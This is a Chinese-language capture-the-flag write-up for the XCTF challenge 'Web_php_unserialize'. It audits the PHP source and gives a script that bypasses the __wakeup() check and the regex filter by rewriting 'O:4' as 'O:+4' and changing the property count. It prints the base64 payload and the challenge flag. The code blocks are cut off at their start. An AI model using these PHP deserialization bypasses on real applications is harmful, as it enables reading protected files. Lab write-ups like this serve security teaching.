【攻防世界】Web_php_unserialize

1.信息收集:

从题目:知道反序列化;

2.源码审计:

 file = $file; 
    }
    function __destruct() { 
        //析构函数在对象被销毁时自动调用,用于执行一些清理操作或释放资源。
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        //在反序列化对象时自动调用
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php   
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    //检查变量是否已设置且不为null
    $var = base64_decode($_GET['var']); 
    //对变量值进行base63解码;
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        //在字符串中使用正则表达式进行匹配。'/[oc]:\d+:/i'是正则表达式
        
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
        //反序列化
    } 
} else { 
    highlight_file("index.php"); 
} 
$x = new Demo('fl4g.php');
$y = serialize($x);
echo $y;

?>

正则表达式模式[oc]:\d+:的含义如下:

  • [oc]:匹配字符oc
  • ::匹配冒号字符。
  • \d+:匹配一个或多个数字。
  • ::匹配冒号字符。

i是一个修饰符,表示匹配时不区分大小写。

preg_match()函数返回匹配的次数,如果匹配成功,则返回1,如果没有匹配成功,则返回0。

3.条件:

1.要绕过wake up 函数:是在反序列化(unserialize)操作中起作用;

绕过:对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么i就调用__wakeup()函数 ,不一致就ok了;

2.要绕过正则表达式模式preg_match('/[oc]:\d+:/i', $var):

这里为什么过滤的是:‘o:数字’和‘c:数字’呢而且不区分大小写;因为serialize() 的参数为 object , 参数类型有对象 " O " , 序列化字符串的格式为 参数格式:参数名长度 , " O:4 "  字符串会被过滤;

绕过:改为‘O:+4’  :str_replace('O:4', 'O:+4',$C)     代替函数,冲字符串y中寻找'O:4',并替换;

3.要base64加密;

编写脚本:

 file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
$x = new Demo('fl4g.php');
$y = serialize($x);
echo $y;            //O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
$z = str_replace('O:4','O:+4',$y);        //绕过preg_match
$w = str_replace(':1:',':2:',$z);        //绕过__wakeup()
var_dump($w);
var_dump(base64_encode($w));
?>

运行后得到:

"TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ=="

$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}";

你可能感兴趣的:(web,web安全,网络安全)